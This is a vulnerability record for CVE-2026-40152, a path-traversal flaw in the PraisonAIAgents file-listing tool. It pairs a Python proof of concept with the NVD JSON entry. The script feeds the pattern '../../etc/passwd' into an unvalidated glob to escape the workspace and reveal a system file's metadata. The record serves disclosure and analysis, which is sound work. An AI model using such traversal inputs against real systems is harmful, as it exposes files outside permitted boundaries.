CVE-2026-40152

import os from pathlib import Path # Simulating the vulnerable behavior in PraisonAIAgents prior to 1.5.128 # This demonstrates how an unvalidated pattern leads to path traversal def vulnerable_list_files(directory, pattern): # In the vulnerable code, directory is validated, but pattern is not. # The pattern is passed directly to Path.glob() target_path = Path(directory) results = [] # Path.glob() resolves '..' in the pattern, allowing traversal for p in target_path.glob(pattern): if p.is_file(): results.append({ "name": p.name, "path": str(p.resolve()), "size": p.stat().st_size }) return results # Exploit Scenario workspace = "/app/workspace" # Malicious input: using '../' to escape the workspace # This attempts to list /etc/passwd if the workspace is /app/workspace malicious_pattern = "../../etc/passwd" print(f"[*] Attempting to list files in '{workspace}' with pattern: '{malicious_pattern}'") # Note: This code is for analysis purposes only. # Actual execution depends on the file system structure. try: leaked_files = vulnerable_list_files(workspace, malicious_pattern) if leaked_files: print("[!] Vulnerability exploited! Found files:") for f in leaked_files: print(f" - Path: {f['path']}, Size: {f['size']}") else: print("[-] No files found or path does not exist.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-40152", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:36.193", "lastModified": "2026-04-20T18:33:29.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, he list_files() tool in FileTools validates the directory parameter against workspace boundaries via _validate_path(), but passes the pattern parameter directly to Path.glob() without any validation. Since Python's Path.glob() supports .. path segments, an attacker can use relative path traversal in the glob pattern to enumerate arbitrary files outside the workspace, obtaining file metadata (existence, name, size, timestamps) for any path on the filesystem. This vulnerability is fixed in 1.5.128."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.128", "matchCriteriaId": "B1797C27-7EBC-4CEF-90B8-F84E8198632D"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7j2f-xc8p-fjmq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}